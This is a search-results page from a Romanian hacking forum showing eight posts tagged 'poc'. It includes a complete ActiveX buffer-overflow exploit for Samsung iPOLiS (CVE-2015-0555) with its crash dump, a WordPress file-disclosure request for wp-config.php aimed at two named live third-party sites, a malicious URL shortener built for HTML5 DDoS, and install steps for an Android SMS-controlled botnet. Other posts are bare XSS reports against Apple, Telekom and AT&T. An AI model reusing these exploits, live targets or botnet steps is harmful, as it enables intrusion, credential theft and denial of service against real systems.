Jump to content

Search the Community

Showing results for tags 'poc'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 8 results

  1. sleed

    [XSS] Apple.com

    [XSS] Apple.com Status Raported PoC:
  2. Vuln.: [Cross site scripting] *.Telekom.de Status: Raported PoC:
  3. sleed

    AT&T

    Vuln.: [XSS] [Cross Site Scripting]: *.att.com Demo ^ Poc : Status: Raportat
  4. <!-- # Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555) # Date: 22/02/2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx # Version: Samsung iPOLiS 1.12.2 # Tested on: Windows 7 Ultimate N SP1 # CVE: 2015-0555 --> <html> <!-- Vulnerability found and PoC coded by Praveen Darshanam http://blog.disects.com CVE-2015-0555 targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" Operating System = Windows 7 Ultimate N SP1 Vulnerable Software = Samsung iPOLiS 1.12.2 CERT tried to coordinate but there wasn't any response from Samsung --> <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var arg1 = ""; var arg2="praveend"; for (i=0; i<= 15000; i++) { arg1 += "A"; } target.WriteConfigValue(arg1 ,arg2); </script> </html> <!-- #############Stack Trace#################### Exception Code: ACCESS_VIOLATION Disasm: 149434 MOV AL,[ESI+EDX] Seh Chain: -------------------------------------------------- 1 647C7D7D mfc100.dll 2 647D0937 mfc100.dll 3 64E242CA VBSCRIPT.dll 4 77B3E0ED ntdll.dll Called From Returns To -------------------------------------------------- XNSSDKDEVICE.149434 41414141 41414141 414141 414141 3DA4C4 3DA4C4 mfc100.647790C1 mfc100.647790C1 56746C75 Registers: -------------------------------------------------- EIP 00149434 EAX 00003841 EBX 00609FB0 -> 0015A564 ECX 00003814 EDX 00414141 EDI 0000008F ESI 0000008F EBP 002BE5FC -> Asc: AAAAAAAAAAA ESP 002BE564 -> 0000000C Block Disassembly: -------------------------------------------------- 149423 XOR EDI,EDI 149425 XOR ESI,ESI 149427 MOV [EBP-8C],ECX 14942D TEST ECX,ECX 14942F JLE SHORT 00149496 149431 MOV EDX,[EBP+8] 149434 MOV AL,[ESI+EDX] <--- CRASH 149437 CMP AL,2F 149439 JNZ SHORT 00149489 14943B MOV ECX,EBX 14943D TEST ESI,ESI 14943F JNZ SHORT 0014944D 149441 PUSH 159F28 149446 CALL 0014F7C0 14944B JMP SHORT 00149476 ArgDump: -------------------------------------------------- EBP+8 00414141 EBP+12 003DA4C4 -> Asc: defaultV EBP+16 647790C1 -> EBE84589 EBP+20 FFFFFFFE EBP+24 646CBE5C -> CCCCCCC3 EBP+28 0000001C Stack Dump: -------------------------------------------------- 2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................] 2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] --> Source
  5. E gasit de ceva vreme ,nu mai am video cu PoC, dar merge. PoC : Reward : Hall Of Thanks : https://secure.sony.net/hallofthanks , Numele meu real este Ionescu George, ma gasiti pe linia a 2 a. Si bineinteles tricoul (Cred ca l-am mai postat)
  6. POC: http://localhost/?sd_action=demo&file=wp-config.php DEMO: hXXP://satoriwheels.org/?sd_action=demo&file=wp-config.php hXXP://skyhighrank.com/?sd_action=demo&file=wp-config.php Sursa
  7. Versus71

    d0z-me

    Malicious URL Shortener + HTML5 DDoS PoC This project demonstrates the serious consequences of the Internet's increased reliance upon URL shortners, as well as how easy it is to create an unwitting DDoS botnet using new HTML5 features without actually exploiting a single computer. It is intended only for demonstration and testing purposes; if you target a site that is not yours, you are responsible for the consequences. Download: http://d0z-me.googlecode.com/files/d0z-me-0.2.tar.gz
  8. To avoid detection, this proof-of-concept code utilizes the Short Messaging Service (SMS) as a command & control channel. This adds fault tolerance because, if a smartphone is not available on the GSM network due to being powered off or out of service range, when an SMS message arrives for delivery, the message is queued and delivered by the network. Download the POC code from Here. Compiling instructions are simple and straight forward. Please follow these: Compile with arm-gcc with the -static flag set Copy to anywhere on the underlying OS that is writable (/data/ is good). Rename /dev/smd0/ to /dev/smd0real/ Start the bot application Kill the radio application (ps | grep rild) The radio will automatically respawn and now the bot proxy will be working The PoC code for smartphone botnet C&C over SMS was presented at the Shmooconheld in January 2011. It seems that the author also has it working for the iPhone platform! For sanity purposes, the PoC code has payloads aka commands removed. So what you see in the demo video will need to be added manually. It however does include logging and a local open port for testing to make developing your own payloads easier! Demo video here Sursa: SomeKnowledge.tk
×
×
  • Create New...